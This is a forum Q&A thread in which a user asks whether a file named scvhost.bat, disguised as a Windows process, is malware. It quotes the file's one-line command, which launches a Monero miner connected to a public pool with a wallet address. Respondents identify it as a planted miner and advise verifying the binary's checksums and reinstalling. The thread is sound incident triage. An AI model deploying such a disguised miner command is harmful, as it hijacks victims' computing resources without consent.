17

I have just found this .bat file that was named scvhost.bat. The file had this content in it :

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Is this a virus (to steal info etc) or a planted miner ? I am worried as I also dabble in crypto currencies and stratum is a currency that is mentioned in above file.

Improve this question
8
  • 1
    This indeed seems to be a miner. Given that you use crypto currencies yourself, if you also mine, make sure this is not actually part of whatever you use to mine. You can do so by renaming the .bat extension to something else and see if you can still normally mine after a reboot. One thing I find odd about this file is that normally it would call itself given that scvhost is both the name of what it executes and the bat file. Normally that would result in a loop.
    – LPChip
    Commented Jan 16, 2018 at 9:34
  • 2
    @VirtualAnomaly I think you are mistaken sVChost with sCVhost mentioned here. Yes I am very much aware that svchost is the mechanics for hosting services.
    – LPChip
    Commented Jan 16, 2018 at 9:55
  • 2
    @LPChip My apologies, you are correct, I was mistaken.
    – James Hyde
    Commented Jan 16, 2018 at 10:03
  • 2
    Somebody played too much Starcraft, I guess.
    – CodesInChaos
    Commented Jan 16, 2018 at 13:01
  • 1
    @lucidbrot SCVs are the "builder" unit of one of the game's races (terrans), in which case it stands for "Space Construction Vehicle".
    – Aaron
    Commented Jan 16, 2018 at 18:26

1 Answer 1

Reset to default
34

This does seem to be a miner of some sort, especially since the parameter contains the URL to a mining pool. However, you need to be sure what is in the binary. It would make sense to compare checksums of the binary you found of your system with the releases made by the development team of the miner. If they differ; consider you system unsecure.

Another issue is that you found out about this miner (probably because it was using a lot of CPU), but you have no idea what else happened on your system. If an intruder could launch the miner, they could've launched other things as well. It might be a good idea to recover from backup or do a fresh install anyway.

Improve this answer
0

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged .